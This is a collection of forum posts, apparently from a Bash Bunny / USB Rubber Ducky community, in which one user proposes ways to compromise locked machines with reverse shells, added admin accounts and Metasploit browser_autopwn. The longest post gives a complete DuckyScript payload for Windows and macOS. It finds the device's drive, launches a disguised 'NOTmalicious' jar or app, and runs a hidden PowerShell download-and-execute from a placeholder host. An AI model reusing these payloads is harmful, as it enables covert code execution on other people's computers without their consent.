Mohamed A. Baset

https://github.com/elkentaro/bashbunny-payloads/blob/master/library/extensions/runpower.sh

@qdba Look at this screenshot and you will understand the reason of my ignored reply! I hope you can find a solution for this. I did a manually debug and the error seems to be in the networking stuff, i don't know!

@qdba Why relying on an SMB server when you can rely on a simple python HTTP one with a little POST script? HTTP servers make sense more than SMB shits, I'm always facing nightmares with SMB :D

The question is straightforward from the title, How to simulate MAC brightness and volume keys with rubber ducky? I tried DELAY 2000 F1 Nothing happened and DELAY 2000 ALT SHIFT F1 Nothing happened too!

The idea is to do this on a locked machine not unlocked, I got the bunny days ago and tried the captive portal payload and i can confirm that the browser firing automatically scenario won't happen on any OS so this stopped my idea on exploiting a browser on a locked machine :) Thanks for your catch up @Opticon

UPDATE: Future Bash Bunny 2.0 and Remote bluetooth controller, Plug it into a locked victim machine, once come back, in a glimpse send a command to act as a duck to implant reverse shell or add admin user, send another command to act as unknown device. Boom done. Many ideas here for sure! Wish you guys be more creative than me :D

Why you're talking about this as it's easy-peasy thing to do? :D There's a must-of a lot of requirements to be done before you will be able to remotely accessing a Windows Registry!

Of course i know that captive portals won't show or popup on top of the lock screen :D but since it pops up in the background and the executed page is controlled by the Bash Bunny attacker then the first scenario mentioned in the original post is possible on one condition (if the bash bunny will be able to run Metasploit) then our captive portal url will be the final url of aux/browser_autopwn metasploit module which will exploit the machine's browser (default if found old) silently. What do you think?

Cool script @illwill but It's prefered to use sync before LEDding

Okay, as per @Sebkinne's clarification that the captive portals won't be able to open the web browser automatically while the machine is locked, What about combining both Samy Kamkar's PoisonTab and metasploit aux/browser_autopwn script (if the Bash Bunny will be able to hold metasploit run and steady) or running pre-plugging it in (the idea of the battery + bash bunny) to exploit the opened browser in the background which of course doing some ajaxed requests or any background activity (the idea of PoisonTab)?!! :D

@Sebkinne Off topic, Can you please confirm if captive portals can automatically opens the browser if devices are locked or not?

Interesting! If captive portals fires automatically in the background on a locked machine then there will be unlimited forms of exploitation, I just want to be sure

Could be! FIrst i want to be sure if the Captive portals fires automatically even if devices are locked or not? This is for scenario #1, For the second scenario it doesn't matter!

HI Guys, This topic is not about a problem in bash bunny or something more than discussing future ideas to make the bash bunny more malicious. 1. What about installing Metasploit framework on the bunny and automatically launch it with aux/browser_autopwn with a proper payload and combining this scenario with captive_portal bunny payload, plug the bunny to a locked machine, the machine automatically launch the captive_portal which in fact is the browser_autopwn aux module link and take over the machine and the best part is "MACHINE IS LOCKED"! 2. If time is not relevant because this requires time, then we can NMAP the $Target_IP, Get all the opened ports, Pass it to metasploit for auto pwning per service/opened port. Just an ideas, Let me hear yours and Happy Bash Bunning....

The link for downloading the script that @Enzym3 wrote!

Hi Guys, Hola Chicos Without long introductions, I'm a big fan of Rubber Ducky, BadUSB techniques, Automation stuff, etc.. Long time ago i was working hard to get the ideal cross-platform payload which works: 1. Cross-OSes 2. Cross-keyboard layouts (not all of them currently) As we all know in a the rubber ducky dual mode (Keyboard + Mass storage) we can't *that easy* to get the drive letter dynamically and all you have to do to execute this command line: for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d This command line loops the current drives letters and finds the one which have the name "DUCKY" then assigns the variable "duck" to its drive letter, after that the %duck% variable will always be pointing to the USB Rubber Ducky drive letter. Cool! Simulating and Writing this command line on some OSes keyboard layouts is a big HEADACHE, Writing (', |, ", ^, etc..) is an Ughhhh a big mess, I wished that USB Rubber Ducky had a copy paste from any source but what we can do, it is a keyboard and we are functionally limited here! Spanish guys know about the big headache of pressing "AltGr" key to get some symbols like @#^ and the only way to simulate this is by modifying the kb layout and add some ascii codes and stuff then rewriting the ducky script etc.. so this topic is for you guys to jump over it, Cheers! The Windows part (Win 8.1 Eng & Win 7 Esp) So i came up with an idea (a tiny but cool one) that allowed me to execute one payload on both Windows 8.1 English UI/Kb Layout and Windows 7 Español UI/Kb Layout and for an extra fun I added some codes to achieve the same on macOS Sierra (a cool way to execute something from Ducky mass storage without the headache of the drive letter and later i will explain why), Here we go: DEFAULT_DELAY 75 DELAY 1000 WINDOWS r DELAY 1000 STRING cmd ENTER DELAY 1000 STRING for %p in DELAY 10 SHIFT 8 STRING A B C D E F G H I J K L M N DELAY 100 STRING O P Q R S T U V W X Y Z DELAY 10 SHIFT 9 DELAY 100 STRING do %p DELAY 10 SHIFT . SHIFT 7 STRING r.bat ENTER DELAY 100 STRING for %p in DELAY 100 STRING (A B C D E F G H I J K L M N DELAY 100 STRING O P Q R S T U V W X Y Z) DELAY 100 STRING do %p:/r.bat ENTER You guys don't need me for sure to explain each step but i will only explain the highlights: 1. I'm looping (in a hard coded way) all the drive letters connected to the machine to find our ONE and execute ANYTHING from a stored .bat file (possibilities are endless here to do what you want) 2. The loop mentioned above is executed twice, First on a Spanish (latin) keyboard layout and you can notice that when i used the "SHIFT 8" key combinations to simulate "(" and "SHIFT 9" to simulate ")" to achieve the command line: for %p in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do %p:/symbiansymoh.bat So, a "for" loop to execute a bat file and this loop will be executed twice (one time for english kb layout and the other is for the spanish kb layout) You can put anything inside this symbiansymoh.bat file but for satisfying your curiosity guys here's my content: @echo off color 10 REM Getting our drive letter which have the name SYMB assign to symb for /f %%d in ('wmic volume get driveletter^, label ^| findstr "SYMB"')do set symb=%%d REM Copy a NOTmalicious file to the temp folder copy %symb%\Executables\NOTmalicious.jpg %tmp%\NOTmalicious.jar /y REM Executing the NOTmalicious file start %tmp%\NOTmalicious.jar REM Downloading and executing another NOTmalicious file powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('https://www.BlahBlahBlah.com/Whatever.exe','%TEMP%\Whatever.exe'); Start-Process "%TEMP%\Whatever.exe" REM Goodbye exit It doesn't matter now what language the machine you're executing the bat file on. The macOS part (English KB Layout) The macOS part is the best and a kind of no brainer here, As you may know Linux, Unix and Linux/Unix-like OSes uses and identifies USB storages by its NAME not LETTER (There's nothing called letters in this beautiful and lovely world) So sending the key combinations to fire the spotlight search then opening the terminal is so freaking easy, then navigating to "/Volumes/[DRIVE_NAME]/", Giving the bash file "symbiansymoh.sh" the executing priveleges (Chmod +X) then executing it which also do ANYTHING from a stored .sh file (possibilities are endless here to do what you want) << copy paste DEFAULT_DELAY 75 DELAY 1000 GUI SPACE DELAY 500 STRING terminal DELAY 100 ENTER DELAY 500 STRING chmod +X /Volumes/SYMB/symbiansymoh.sh ENTER DELAY 100 STRING nohup sh /Volumes/SYMB/symbioansymoh.sh &>/dev/null & ENTER DELAY 100 GUI q DELAY 300 ENTER And again for feeding your curiosity here's the content of my symbiansymoh.sh file: #!/bin/bash rm -r /tmp/NOTmalicious.app; cp -R /Volumes/SYMB/NOTmalicious /tmp/NOTmalicious.app; open /tmp/NOTmalicious.app; that copies a stored NOTmalicious.app file to the temp folder then executes it. Here's a PoC video demonstrates the blah blah blah above: https://www.youtube.com/watch?v=YHzcI42dFOI The topic is open to discussion, Any ideas, modification is always welcome! Cheers and have a great weekend guys!

We're sorry. You can't access this item because it is in violation of our Terms of Service. !!